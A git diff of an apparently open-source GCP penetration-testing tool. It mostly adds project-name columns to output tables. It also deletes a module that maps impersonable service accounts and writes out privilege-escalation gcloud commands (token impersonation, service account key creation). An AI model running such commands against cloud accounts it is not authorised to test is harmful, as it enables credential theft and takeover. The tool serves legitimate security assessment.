--git a/gcp/commands/scheduler.go b/gcp/commands/scheduler.go index 91a5631c..76b1a595 100644 --- a/gcp/commands/scheduler.go +++ b/gcp/commands/scheduler.go @@ -257,6 +257,7 @@ func (m *SchedulerModule) addJobToLoot(job SchedulerService.JobInfo) { func (m *SchedulerModule) writeOutput(ctx context.Context, logger internal.Logger) { // Jobs table header := []string{ + "Project Name", "Project ID", "Job Name", "Location", @@ -289,6 +290,7 @@ func (m *SchedulerModule) writeOutput(ctx context.Context, logger internal.Logge } body = append(body, []string{ + m.GetProjectName(job.ProjectID), job.ProjectID, job.Name, job.Location, @@ -323,6 +325,11 @@ func (m *SchedulerModule) writeOutput(ctx context.Context, logger internal.Logge Loot: lootFiles, } + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + err := internal.HandleOutputSmart( "gcp", m.Format, @@ -331,7 +338,7 @@ func (m *SchedulerModule) writeOutput(ctx context.Context, logger internal.Logge m.WrapTable, "project", m.ProjectIDs, - m.ProjectIDs, + scopeNames, m.Account, output, ) diff --git a/gcp/commands/secrets.go b/gcp/commands/secrets.go index bbdaaf94..95b729ee 100644 --- a/gcp/commands/secrets.go +++ b/gcp/commands/secrets.go @@ -440,6 +440,7 @@ func getSecretMemberType(member string) string { func (m *SecretsModule) writeOutput(ctx context.Context, logger internal.Logger) { // Main table with security-relevant columns header := []string{ + "Project Name", "Project ID", "Name", "Encryption", @@ -471,6 +472,7 @@ func (m *SecretsModule) writeOutput(ctx context.Context, logger internal.Logger) } body = append(body, []string{ + m.GetProjectName(secret.ProjectID), secret.ProjectID, secretName, secret.EncryptionType, @@ -485,6 +487,7 @@ func (m *SecretsModule) writeOutput(ctx context.Context, logger internal.Logger) // Detailed IAM table - one row per member iamHeader := []string{ "Secret", + "Project Name", "Project ID", "Role", "Member Type", @@ -499,6 +502,7 @@ func (m *SecretsModule) writeOutput(ctx context.Context, logger internal.Logger) memberType := getSecretMemberType(member) iamBody = append(iamBody, []string{ secretName, + m.GetProjectName(secret.ProjectID), secret.ProjectID, binding.Role, memberType, @@ -511,6 +515,7 @@ func (m *SecretsModule) writeOutput(ctx context.Context, logger internal.Logger) // Security configuration table securityHeader := []string{ "Secret", + "Project Name", "Project ID", "Rotation", "Next Rotation", @@ -547,6 +552,7 @@ func (m *SecretsModule) writeOutput(ctx context.Context, logger internal.Logger) } securityBody = append(securityBody, []string{ secretName, + m.GetProjectName(secret.ProjectID), secret.ProjectID, secret.Rotation, nextRotation, @@ -596,15 +602,19 @@ func (m *SecretsModule) writeOutput(ctx context.Context, logger internal.Logger) } // Write output using HandleOutputSmart with scope support + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } err := internal.HandleOutputSmart( "gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, - "project", // scopeType - m.ProjectIDs, // scopeIdentifiers - m.ProjectIDs, // scopeNames (same as IDs for GCP projects) + "project", // scopeType + m.ProjectIDs, // scopeIdentifiers + scopeNames, // scopeNames m.Account, output, ) diff --git a/gcp/commands/securitycenter.go b/gcp/commands/securitycenter.go index accef968..6e247679 100644 --- a/gcp/commands/securitycenter.go +++ b/gcp/commands/securitycenter.go @@ -542,7 +542,8 @@ func (m *SecurityCenterModule) writeOutput(ctx context.Context, logger internal. "Severity", "Category", "Resource", - "Project", + "Project Name", + "Project ID", "Risk Score", "Created", } @@ -553,6 +554,7 @@ func (m *SecurityCenterModule) writeOutput(ctx context.Context, logger internal. f.Severity, f.Category, sccTruncateString(f.ResourceName, 60), + m.GetProjectName(f.ProjectID), f.ProjectID, fmt.Sprintf("%d", f.RiskScore), f.CreateTime, @@ -563,7 +565,8 @@ func (m *SecurityCenterModule) writeOutput(ctx context.Context, logger internal. criticalHeader := []string{ "Category", "Resource", - "Project", + "Project Name", + "Project ID", "Description", "Recommendation", } @@ -574,6 +577,7 @@ func (m *SecurityCenterModule) writeOutput(ctx context.Context, logger internal. criticalBody = append(criticalBody, []string{ f.Category, sccTruncateString(f.ResourceName, 50), + m.GetProjectName(f.ProjectID), f.ProjectID, sccTruncateString(f.Description, 60), sccTruncateString(f.Recommendation, 50), @@ -585,7 +589,8 @@ func (m *SecurityCenterModule) writeOutput(ctx context.Context, logger internal. assetsHeader := []string{ "Resource", "Type", - "Project", + "Project Name", + "Project ID", "Finding Count", "Max Severity", } @@ -595,15 +600,16 @@ func (m *SecurityCenterModule) writeOutput(ctx context.Context, logger internal. assetsBody = append(assetsBody, []string{ sccTruncateString(asset.ResourceName, 60), asset.ResourceType, + m.GetProjectName(asset.ProjectID), asset.ProjectID, fmt.Sprintf("%d", asset.FindingCount), asset.Severity, }) } - // Sort assets by finding count + // Sort assets by finding count (index 4 now, not 3, since we added Project Name column) sort.Slice(assetsBody, func(i, j int) bool { - return assetsBody[i][3] > assetsBody[j][3] + return assetsBody[i][4] > assetsBody[j][4] }) // Summary by category @@ -680,6 +686,12 @@ func (m *SecurityCenterModule) writeOutput(ctx context.Context, logger internal. Loot: lootFiles, } + // Build scopeNames using GetProjectName + scopeNames := make([]string, len(m.ProjectIDs)) + for i, projectID := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(projectID) + } + // Write output err := internal.HandleOutputSmart( "gcp", @@ -689,7 +701,7 @@ func (m *SecurityCenterModule) writeOutput(ctx context.Context, logger internal. m.WrapTable, "project", m.ProjectIDs, - m.ProjectIDs, + scopeNames, m.Account, output, ) diff --git a/gcp/commands/serviceaccounts.go b/gcp/commands/serviceaccounts.go index 99fe28dc..ae314a31 100644 --- a/gcp/commands/serviceaccounts.go +++ b/gcp/commands/serviceaccounts.go @@ -565,6 +565,7 @@ func (m *ServiceAccountsModule) writeOutput(ctx context.Context, logger internal saHeader := []string{ "Email", "Display Name", + "Project Name", "Project", "Disabled", "Default SA", @@ -598,6 +599,7 @@ func (m *ServiceAccountsModule) writeOutput(ctx context.Context, logger internal saBody = append(saBody, []string{ sa.Email, sa.DisplayName, + m.GetProjectName(sa.ProjectID), sa.ProjectID, disabled, defaultSA, @@ -610,6 +612,7 @@ func (m *ServiceAccountsModule) writeOutput(ctx context.Context, logger internal // Service accounts with keys table keysHeader := []string{ "Service Account", + "Project Name", "Project", "Key Count", "Oldest Key Age", @@ -632,6 +635,7 @@ func (m *ServiceAccountsModule) writeOutput(ctx context.Context, logger internal keysBody = append(keysBody, []string{ sa.Email, + m.GetProjectName(sa.ProjectID), sa.ProjectID, fmt.Sprintf("%d", sa.KeyCount), fmt.Sprintf("%d days", sa.OldestKeyAge), @@ -645,6 +649,7 @@ func (m *ServiceAccountsModule) writeOutput(ctx context.Context, logger internal // High-risk service accounts table highRiskHeader := []string{ "Service Account", + "Project Name", "Project", "Risk Level", "Risk Reasons", @@ -655,6 +660,7 @@ func (m *ServiceAccountsModule) writeOutput(ctx context.Context, logger internal if sa.RiskLevel == "HIGH" || sa.RiskLevel == "MEDIUM" { highRiskBody = append(highRiskBody, []string{ sa.Email, + m.GetProjectName(sa.ProjectID), sa.ProjectID, sa.RiskLevel, strings.Join(sa.RiskReasons, "; "), @@ -665,6 +671,7 @@ func (m *ServiceAccountsModule) writeOutput(ctx context.Context, logger internal // Default service accounts table defaultHeader := []string{ "Service Account", + "Project Name", "Project", "Type", "Has Keys", @@ -685,6 +692,7 @@ func (m *ServiceAccountsModule) writeOutput(ctx context.Context, logger internal defaultBody = append(defaultBody, []string{ sa.Email, + m.GetProjectName(sa.ProjectID), sa.ProjectID, sa.DefaultSAType, hasKeys, @@ -742,6 +750,7 @@ func (m *ServiceAccountsModule) writeOutput(ctx context.Context, logger internal // Pentest: Impersonation table impersonationHeader := []string{ "Service Account", + "Project Name", "Project", "Token Creators", "Key Creators", @@ -771,6 +780,7 @@ func (m *ServiceAccountsModule) writeOutput(ctx context.Context, logger internal impersonationBody = append(impersonationBody, []string{ sa.Email, + m.GetProjectName(sa.ProjectID), sa.ProjectID, tokenCreators, keyCreators, @@ -796,6 +806,10 @@ func (m *ServiceAccountsModule) writeOutput(ctx context.Context, logger internal } // Write output using HandleOutputSmart with scope support + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } err := internal.HandleOutputSmart( "gcp", m.Format, @@ -804,7 +818,7 @@ func (m *ServiceAccountsModule) writeOutput(ctx context.Context, logger internal m.WrapTable, "project", // scopeType m.ProjectIDs, // scopeIdentifiers - m.ProjectIDs, // scopeNames (same as IDs for GCP projects) + scopeNames, // scopeNames m.Account, output, ) diff --git a/gcp/commands/serviceagents.go b/gcp/commands/serviceagents.go index 43698622..86f0005a 100644 --- a/gcp/commands/serviceagents.go +++ b/gcp/commands/serviceagents.go @@ -225,6 +225,7 @@ func (m *ServiceAgentsModule) writeOutput(ctx context.Context, logger internal.L "Email", "Roles", "Cross-Project", + "Project Name", "Project", } @@ -255,6 +256,7 @@ func (m *ServiceAgentsModule) writeOutput(ctx context.Context, logger internal.L emailDisplay, rolesDisplay, crossProject, + m.GetProjectName(agent.ProjectID), agent.ProjectID, }) } @@ -307,6 +309,11 @@ func (m *ServiceAgentsModule) writeOutput(ctx context.Context, logger internal.L Loot: lootFiles, } + scopeNames := make([]string, len(m.ProjectIDs)) + for i, projectID := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(projectID) + } + err := internal.HandleOutputSmart( "gcp", m.Format, @@ -315,7 +322,7 @@ func (m *ServiceAgentsModule) writeOutput(ctx context.Context, logger internal.L m.WrapTable, "project", m.ProjectIDs, - m.ProjectIDs, + scopeNames, m.Account, output, ) diff --git a/gcp/commands/sourcerepos.go b/gcp/commands/sourcerepos.go index 4c27e2e5..822ed32e 100644 --- a/gcp/commands/sourcerepos.go +++ b/gcp/commands/sourcerepos.go @@ -181,6 +181,7 @@ func (m *SourceReposModule) writeOutput(ctx context.Context, logger internal.Log "Mirror", "Triggers", "Risk", + "Project Name", "Project", } @@ -208,6 +209,7 @@ func (m *SourceReposModule) writeOutput(ctx context.Context, logger internal.Log mirror, fmt.Sprintf("%d", repo.PubsubConfigs), repo.RiskLevel, + m.GetProjectName(repo.ProjectID), repo.ProjectID, }) } @@ -233,6 +235,11 @@ func (m *SourceReposModule) writeOutput(ctx context.Context, logger internal.Log Loot: lootFiles, } + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + err := internal.HandleOutputSmart( "gcp", m.Format, @@ -241,7 +248,7 @@ func (m *SourceReposModule) writeOutput(ctx context.Context, logger internal.Log m.WrapTable, "project", m.ProjectIDs, - m.ProjectIDs, + scopeNames, m.Account, output, ) diff --git a/gcp/commands/spanner.go b/gcp/commands/spanner.go index 496a08d5..17bad93c 100644 --- a/gcp/commands/spanner.go +++ b/gcp/commands/spanner.go @@ -103,7 +103,7 @@ func (m *SpannerModule) addToLoot(instance spannerservice.SpannerInstanceInfo) { } func (m *SpannerModule) writeOutput(ctx context.Context, logger internal.Logger) { - header := []string{"Name", "Display Name", "Config", "Nodes", "Databases", "State", "Project"} + header := []string{"Name", "Display Name", "Config", "Nodes", "Databases", "State", "Project Name", "Project"} var body [][]string for _, instance := range m.Instances { @@ -114,6 +114,7 @@ func (m *SpannerModule) writeOutput(ctx context.Context, logger internal.Logger) fmt.Sprintf("%d", instance.NodeCount), strings.Join(instance.Databases, ", "), instance.State, + m.GetProjectName(instance.ProjectID), instance.ProjectID, }) } @@ -130,6 +131,11 @@ func (m *SpannerModule) writeOutput(ctx context.Context, logger internal.Logger) Loot: lootFiles, } + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, - "project", m.ProjectIDs, m.ProjectIDs, m.Account, output) + "project", m.ProjectIDs, scopeNames, m.Account, output) } diff --git a/gcp/commands/sshoslogin.go b/gcp/commands/sshoslogin.go index aa21df21..12865f88 100644 --- a/gcp/commands/sshoslogin.go +++ b/gcp/commands/sshoslogin.go @@ -249,6 +249,7 @@ func (m *SSHOsLoginModule) writeOutput(ctx context.Context, logger internal.Logg // OS Login Config table if len(m.OSLoginConfigs) > 0 { configHeader := []string{ + "Project Name", "Project", "OS Login", "2FA Required", @@ -259,6 +260,7 @@ func (m *SSHOsLoginModule) writeOutput(ctx context.Context, logger internal.Logg var configBody [][]string for _, config := range m.OSLoginConfigs { configBody = append(configBody, []string{ + m.GetProjectName(config.ProjectID), config.ProjectID, boolToYesNo(config.OSLoginEnabled), boolToYesNo(config.OSLogin2FAEnabled), @@ -284,6 +286,7 @@ func (m *SSHOsLoginModule) writeOutput(ctx context.Context, logger internal.Logg "SSH Keys", "Risk", "Zone", + "Project Name", "Project", } @@ -302,6 +305,7 @@ func (m *SSHOsLoginModule) writeOutput(ctx context.Context, logger internal.Logg fmt.Sprintf("%d", access.SSHKeysCount), access.RiskLevel, access.Zone, + m.GetProjectName(access.ProjectID), access.ProjectID, }) } @@ -320,6 +324,7 @@ func (m *SSHOsLoginModule) writeOutput(ctx context.Context, logger internal.Logg "Key Type", "Source", "Instance", + "Project Name", "Project", } @@ -335,6 +340,7 @@ func (m *SSHOsLoginModule) writeOutput(ctx context.Context, logger internal.Logg key.KeyType, key.Source, instance, + m.GetProjectName(key.ProjectID), key.ProjectID, }) } @@ -359,6 +365,11 @@ func (m *SSHOsLoginModule) writeOutput(ctx context.Context, logger internal.Logg Loot: lootFiles, } + scopeNames := make([]string, len(m.ProjectIDs)) + for i, projectID := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(projectID) + } + err := internal.HandleOutputSmart( "gcp", m.Format, @@ -367,7 +378,7 @@ func (m *SSHOsLoginModule) writeOutput(ctx context.Context, logger internal.Logg m.WrapTable, "project", m.ProjectIDs, - m.ProjectIDs, + scopeNames, m.Account, output, ) diff --git a/gcp/commands/vpcnetworks.go b/gcp/commands/vpcnetworks.go index 9b3084e6..830624d6 100644 --- a/gcp/commands/vpcnetworks.go +++ b/gcp/commands/vpcnetworks.go @@ -198,7 +198,7 @@ func (m *VPCNetworksModule) writeOutput(ctx context.Context, logger internal.Log var tables []internal.TableFile // Networks table - netHeader := []string{"Name", "Routing Mode", "Auto Subnets", "Subnets", "Peerings", "Risk", "Project"} + netHeader := []string{"Name", "Routing Mode", "Auto Subnets", "Subnets", "Peerings", "Risk", "Project Name", "Project"} var netBody [][]string for _, network := range m.Networks { autoSubnets := "No" @@ -212,6 +212,7 @@ func (m *VPCNetworksModule) writeOutput(ctx context.Context, logger internal.Log fmt.Sprintf("%d", len(network.Subnetworks)), fmt.Sprintf("%d", len(network.Peerings)), network.RiskLevel, + m.GetProjectName(network.ProjectID), network.ProjectID, }) } @@ -223,7 +224,7 @@ func (m *VPCNetworksModule) writeOutput(ctx context.Context, logger internal.Log // Subnets table if len(m.Subnets) > 0 { - subHeader := []string{"Name", "Network", "Region", "CIDR", "Private Access", "Flow Logs", "Risk", "Project"} + subHeader := []string{"Name", "Network", "Region", "CIDR", "Private Access", "Flow Logs", "Risk", "Project Name", "Project"} var subBody [][]string for _, subnet := range m.Subnets { privateAccess := "No" @@ -242,6 +243,7 @@ func (m *VPCNetworksModule) writeOutput(ctx context.Context, logger internal.Log privateAccess, flowLogs, subnet.RiskLevel, + m.GetProjectName(subnet.ProjectID), subnet.ProjectID, }) } @@ -254,7 +256,7 @@ func (m *VPCNetworksModule) writeOutput(ctx context.Context, logger internal.Log // Peerings table if len(m.Peerings) > 0 { - peerHeader := []string{"Name", "Network", "Peer Network", "Peer Project", "State", "Lateral Move", "Risk", "Project"} + peerHeader := []string{"Name", "Network", "Peer Network", "Peer Project", "State", "Lateral Move", "Risk", "Project Name", "Project"} var peerBody [][]string for _, peering := range m.Peerings { lateralMove := "No" @@ -273,6 +275,7 @@ func (m *VPCNetworksModule) writeOutput(ctx context.Context, logger internal.Log peering.State, lateralMove, peering.RiskLevel, + m.GetProjectName(peering.ProjectID), peering.ProjectID, }) } @@ -291,7 +294,7 @@ func (m *VPCNetworksModule) writeOutput(ctx context.Context, logger internal.Log } } if len(customRoutes) > 0 { - routeHeader := []string{"Name", "Network", "Dest Range", "Next Hop Type", "Next Hop", "Priority", "Project"} + routeHeader := []string{"Name", "Network", "Dest Range", "Next Hop Type", "Next Hop", "Priority", "Project Name", "Project"} var routeBody [][]string for _, route := range customRoutes { routeBody = append(routeBody, []string{ @@ -301,6 +304,7 @@ func (m *VPCNetworksModule) writeOutput(ctx context.Context, logger internal.Log route.NextHopType, route.NextHop, fmt.Sprintf("%d", route.Priority), + m.GetProjectName(route.ProjectID), route.ProjectID, }) } @@ -320,8 +324,13 @@ func (m *VPCNetworksModule) writeOutput(ctx context.Context, logger internal.Log output := VPCNetworksOutput{Table: tables, Loot: lootFiles} + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + err := internal.HandleOutputSmart("gcp", m.Format, m.OutputDirectory, m.Verbosity, m.WrapTable, - "project", m.ProjectIDs, m.ProjectIDs, m.Account, output) + "project", m.ProjectIDs, scopeNames, m.Account, output) if err != nil { logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_VPCNETWORKS_MODULE_NAME) } diff --git a/gcp/commands/whoami-enhanced.go b/gcp/commands/whoami-enhanced.go deleted file mode 100644 index a8601f9f..00000000 --- a/gcp/commands/whoami-enhanced.go +++ /dev/null @@ -1,722 +0,0 @@ -package commands - -import ( - "context" - "fmt" - "strings" - "sync" - - IAMService "github.com/BishopFox/cloudfox/gcp/services/iamService" - OAuthService "github.com/BishopFox/cloudfox/gcp/services/oauthService" - "github.com/BishopFox/cloudfox/globals" - "github.com/BishopFox/cloudfox/internal" - gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" - "github.com/spf13/cobra" - - cloudresourcemanager "google.golang.org/api/cloudresourcemanager/v1" -) - -// Module name constant for enhanced whoami -const GCP_WHOAMI_ENHANCED_MODULE_NAME string = "whoami-full" - -var GCPWhoAmIEnhancedCommand = &cobra.Command{ - Use: GCP_WHOAMI_ENHANCED_MODULE_NAME, - Aliases: []string{"whoami-enhanced", "identity", "me"}, - Short: "Display comprehensive identity context with permissions and capabilities", - Long: `Display comprehensive identity context for the authenticated GCP user/service account. - -Features: -- Current identity details (email, type, account info) -- Effective permissions across all projects -- Group memberships (if using user account) -- Service accounts that can be impersonated -- Organization and folder context -- Privilege escalation opportunities -- Token details and expiration - -This is an enhanced version of 'whoami' that provides full identity context -similar to Azure's whoami module.`, - Run: runGCPWhoAmIEnhancedCommand, -} - -// ------------------------------ -// Data Structures -// ------------------------------ - -type IdentityContext struct { - Email string - Type string // "user" or "serviceAccount" - UniqueID string - ProjectIDs []string - Organizations []OrgInfo - Folders []FolderInfo -} - -type OrgInfo struct { - Name string - DisplayName string - OrgID string -} - -type FolderInfo struct { - Name string - DisplayName string - Parent string -} - -type RoleBinding struct { - Role string - Scope string // "organization", "folder", "project" - ScopeID string - Inherited bool - Condition string -} - -type ImpersonationTarget struct { - ServiceAccount string - ProjectID string - CanImpersonate bool - CanCreateKeys bool - CanActAs bool -} - -type PrivilegeEscalationPath struct { - Name string - Description string - Risk string // CRITICAL, HIGH, MEDIUM - Command string -} - -// ------------------------------ -// Module Struct -// ------------------------------ -type WhoAmIEnhancedModule struct { - gcpinternal.BaseGCPModule - - Identity IdentityContext - RoleBindings []RoleBinding - ImpersonationTargets []ImpersonationTarget - PrivEscPaths []PrivilegeEscalationPath - DangerousPermissions []string - LootMap map[string]*internal.LootFile - mu sync.Mutex -} - -// ------------------------------ -// Output Struct -// ------------------------------ -type WhoAmIEnhancedOutput struct { - Table []internal.TableFile - Loot []internal.LootFile -} - -func (o WhoAmIEnhancedOutput) TableFiles() []internal.TableFile { return o.Table } -func (o WhoAmIEnhancedOutput) LootFiles() []internal.LootFile { return o.Loot } - -// ------------------------------ -// Command Entry Point -// ------------------------------ -func runGCPWhoAmIEnhancedCommand(cmd *cobra.Command, args []string) { - // Initialize command context - cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, GCP_WHOAMI_ENHANCED_MODULE_NAME) - if err != nil { - return - } - - // Create module instance - module := &WhoAmIEnhancedModule{ - BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), - RoleBindings: []RoleBinding{}, - ImpersonationTargets: []ImpersonationTarget{}, - PrivEscPaths: []PrivilegeEscalationPath{}, - DangerousPermissions: []string{}, - LootMap: make(map[string]*internal.LootFile), - } - - // Initialize loot files - module.initializeLootFiles() - - // Execute enumeration - module.Execute(cmdCtx.Ctx, cmdCtx.Logger) -} - -// ------------------------------ -// Module Execution -// ------------------------------ -func (m *WhoAmIEnhancedModule) Execute(ctx context.Context, logger internal.Logger) { - logger.InfoM("Gathering comprehensive identity context...", GCP_WHOAMI_ENHANCED_MODULE_NAME) - - // Step 1: Get current identity - oauthService := OAuthService.NewOAuthService() - principal, err := oauthService.WhoAmI() - if err != nil { - logger.ErrorM(fmt.Sprintf("Error retrieving token info: %v", err), GCP_WHOAMI_ENHANCED_MODULE_NAME) - return - } - - m.Identity = IdentityContext{ - Email: principal.Email, - ProjectIDs: m.ProjectIDs, - } - - // Determine identity type - if strings.HasSuffix(principal.Email, ".gserviceaccount.com") { - m.Identity.Type = "serviceAccount" - } else { - m.Identity.Type = "user" - } - - logger.InfoM(fmt.Sprintf("Authenticated as: %s (%s)", m.Identity.Email, m.Identity.Type), GCP_WHOAMI_ENHANCED_MODULE_NAME) - - // Step 2: Get organization context - m.getOrganizationContext(ctx, logger) - - // Step 3: Get role bindings across projects - m.getRoleBindings(ctx, logger) - - // Step 4: Find impersonation targets - m.findImpersonationTargets(ctx, logger) - - // Step 5: Identify privilege escalation paths - m.identifyPrivEscPaths(ctx, logger) - - // Step 6: Generate loot - m.generateLoot() - - // Write output - m.writeOutput(ctx, logger) -} - -// getOrganizationContext retrieves organization and folder hierarchy -func (m *WhoAmIEnhancedModule) getOrganizationContext(ctx context.Context, logger internal.Logger) { - // Create resource manager client - crmService, err := cloudresourcemanager.NewService(ctx) - if err != nil { - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.ErrorM(fmt.Sprintf("Error creating CRM client: %v", err), GCP_WHOAMI_ENHANCED_MODULE_NAME) - } - return - } - - // Get project ancestry for each project - for _, projectID := range m.ProjectIDs { - resp, err := crmService.Projects.GetAncestry(projectID, &cloudresourcemanager.GetAncestryRequest{}).Do() - if err != nil { - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.ErrorM(fmt.Sprintf("Error getting ancestry for project %s: %v", projectID, err), GCP_WHOAMI_ENHANCED_MODULE_NAME) - } - continue - } - - for _, ancestor := range resp.Ancestor { - switch ancestor.ResourceId.Type { - case "organization": - orgInfo := OrgInfo{ - OrgID: ancestor.ResourceId.Id, - Name: fmt.Sprintf("organizations/%s", ancestor.ResourceId.Id), - } - // Check if already added - exists := false - for _, o := range m.Identity.Organizations { - if o.OrgID == orgInfo.OrgID { - exists = true - break - } - } - if !exists { - m.Identity.Organizations = append(m.Identity.Organizations, orgInfo) - } - case "folder": - folderInfo := FolderInfo{ - Name: fmt.Sprintf("folders/%s", ancestor.ResourceId.Id), - } - // Check if already added - exists := false - for _, f := range m.Identity.Folders { - if f.Name == folderInfo.Name { - exists = true - break - } - } - if !exists { - m.Identity.Folders = append(m.Identity.Folders, folderInfo) - } - } - } - } - - if len(m.Identity.Organizations) > 0 { - logger.InfoM(fmt.Sprintf("Found %d organization(s), %d folder(s)", len(m.Identity.Organizations), len(m.Identity.Folders)), GCP_WHOAMI_ENHANCED_MODULE_NAME) - } -} - -// getRoleBindings retrieves IAM role bindings for the current identity -func (m *WhoAmIEnhancedModule) getRoleBindings(ctx context.Context, logger internal.Logger) { - iamService := IAMService.New() - - // Determine the member format for current identity - var memberPrefix string - if m.Identity.Type == "serviceAccount" { - memberPrefix = "serviceAccount:" - } else { - memberPrefix = "user:" - } - fullMember := memberPrefix + m.Identity.Email - - // Get role bindings from each project - for _, projectID := range m.ProjectIDs { - // Use PrincipalsWithRolesEnhanced which includes inheritance - principals, err := iamService.PrincipalsWithRolesEnhanced(projectID) - if err != nil { - if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { - logger.ErrorM(fmt.Sprintf("Error getting IAM bindings for project %s: %v", projectID, err), GCP_WHOAMI_ENHANCED_MODULE_NAME) - } - continue - } - - // Find bindings for the current identity - for _, principal := range principals { - if principal.Name == fullMember || principal.Email == m.Identity.Email { - for _, binding := range principal.PolicyBindings { - rb := RoleBinding{ - Role: binding.Role, - Scope: binding.ResourceType, - ScopeID: binding.ResourceID, - Inherited: binding.IsInherited, - } - if binding.HasCondition && binding.ConditionInfo != nil { - rb.Condition = binding.ConditionInfo.Title - } - - // Check for dangerous permissions - if isDangerousRole(binding.Role) { - m.DangerousPermissions = append(m.DangerousPermissions, fmt.Sprintf("%s on %s", binding.Role, binding.ResourceID)) - } - - m.mu.Lock() - m.RoleBindings = append(m.RoleBindings, rb) - m.mu.Unlock() - } - } - } - } - - logger.InfoM(fmt.Sprintf("Found %d role binding(s) for current identity", len(m.RoleBindings)), GCP_WHOAMI_ENHANCED_MODULE_NAME) -} - -// findImpersonationTargets identifies service accounts that can be impersonated -func (m *WhoAmIEnhancedModule) findImpersonationTargets(ctx context.Context, logger internal.Logger) { - iamService := IAMService.New() - - // Determine the member format for current identity - var memberPrefix string - if m.Identity.Type == "serviceAccount" { - memberPrefix = "serviceAccount:" - } else { - memberPrefix = "user:" - } - fullMember := memberPrefix + m.Identity.Email - - for _, projectID := range m.ProjectIDs { - // Get all service accounts in the project - serviceAccounts, err := iamService.ServiceAccounts(projectID) - if err != nil { - continue - } - - for _, sa := range serviceAccounts { - // Check if current identity can impersonate this SA using GetServiceAccountIAMPolicy - impersonationInfo, err := iamService.GetServiceAccountIAMPolicy(ctx, sa.Email, projectID) - if err != nil { - continue - } - - // Check if current identity is in the token creators or key creators list - canImpersonate := false - canCreateKeys := false - canActAs := false - - for _, tc := range impersonationInfo.TokenCreators { - if tc == fullMember || tc == m.Identity.Email || tc == "allUsers" || tc == "allAuthenticatedUsers" { - canImpersonate = true - break - } - } - - for _, kc := range impersonationInfo.KeyCreators { - if kc == fullMember || kc == m.Identity.Email || kc == "allUsers" || kc == "allAuthenticatedUsers" { - canCreateKeys = true - break - } - } - - for _, aa := range impersonationInfo.ActAsUsers { - if aa == fullMember || aa == m.Identity.Email || aa == "allUsers" || aa == "allAuthenticatedUsers" { - canActAs = true - break - } - } - - if canImpersonate || canCreateKeys || canActAs { - target := ImpersonationTarget{ - ServiceAccount: sa.Email, - ProjectID: projectID, - CanImpersonate: canImpersonate, - CanCreateKeys: canCreateKeys, - CanActAs: canActAs, - } - m.ImpersonationTargets = append(m.ImpersonationTargets, target) - } - } - } - - if len(m.ImpersonationTargets) > 0 { - logger.InfoM(fmt.Sprintf("[PENTEST] Found %d service account(s) that can be impersonated", len(m.ImpersonationTargets)), GCP_WHOAMI_ENHANCED_MODULE_NAME) - } -} - -// identifyPrivEscPaths identifies privilege escalation paths based on current permissions -func (m *WhoAmIEnhancedModule) identifyPrivEscPaths(ctx context.Context, logger internal.Logger) { - // Check for privilege escalation opportunities based on role bindings - for _, rb := range m.RoleBindings { - paths := getPrivEscPathsForRole(rb.Role, rb.ScopeID) - m.PrivEscPaths = append(m.PrivEscPaths, paths...) - } - - // Check impersonation-based privilege escalation - for _, target := range m.ImpersonationTargets { - if target.CanImpersonate { - path := PrivilegeEscalationPath{ - Name: fmt.Sprintf("Impersonate %s", target.ServiceAccount), - Description: "Can generate access tokens for this service account", - Risk: "HIGH", - Command: fmt.Sprintf("gcloud auth print-access-token --impersonate-service-account=%s", target.ServiceAccount), - } - m.PrivEscPaths = append(m.PrivEscPaths, path) - } - - if target.CanCreateKeys { - path := PrivilegeEscalationPath{ - Name: fmt.Sprintf("Create key for %s", target.ServiceAccount), - Description: "Can create persistent service account keys", - Risk: "CRITICAL", - Command: fmt.Sprintf("gcloud iam service-accounts keys create key.json --iam-account=%s", target.ServiceAccount), - } - m.PrivEscPaths = append(m.PrivEscPaths, path) - } - } - - if len(m.PrivEscPaths) > 0 { - logger.InfoM(fmt.Sprintf("[PRIVESC] Found %d privilege escalation path(s)", len(m.PrivEscPaths)), GCP_WHOAMI_ENHANCED_MODULE_NAME) - } -} - -// isDangerousRole checks if a role is considered dangerous -func isDangerousRole(role string) bool { - dangerousRoles := []string{ - "roles/owner", - "roles/editor", - "roles/iam.securityAdmin", - "roles/iam.serviceAccountAdmin", - "roles/iam.serviceAccountKeyAdmin", - "roles/iam.serviceAccountTokenCreator", - "roles/resourcemanager.organizationAdmin", - "roles/resourcemanager.folderAdmin", - "roles/resourcemanager.projectIamAdmin", - "roles/cloudfunctions.admin", - "roles/compute.admin", - "roles/container.admin", - "roles/storage.admin", - } - - for _, dr := range dangerousRoles { - if role == dr { - return true - } - } - return false -} - -// getPrivEscPathsForRole returns privilege escalation paths for a given role -func getPrivEscPathsForRole(role, projectID string) []PrivilegeEscalationPath { - var paths []PrivilegeEscalationPath - - switch role { - case "roles/iam.serviceAccountTokenCreator": - paths = append(paths, PrivilegeEscalationPath{ - Name: "Token Creator - Impersonate any SA", - Description: "Can generate access tokens for any service account in the project", - Risk: "CRITICAL", - Command: fmt.Sprintf("gcloud iam service-accounts list --project=%s", projectID), - }) - case "roles/iam.serviceAccountKeyAdmin": - paths = append(paths, PrivilegeEscalationPath{ - Name: "Key Admin - Create 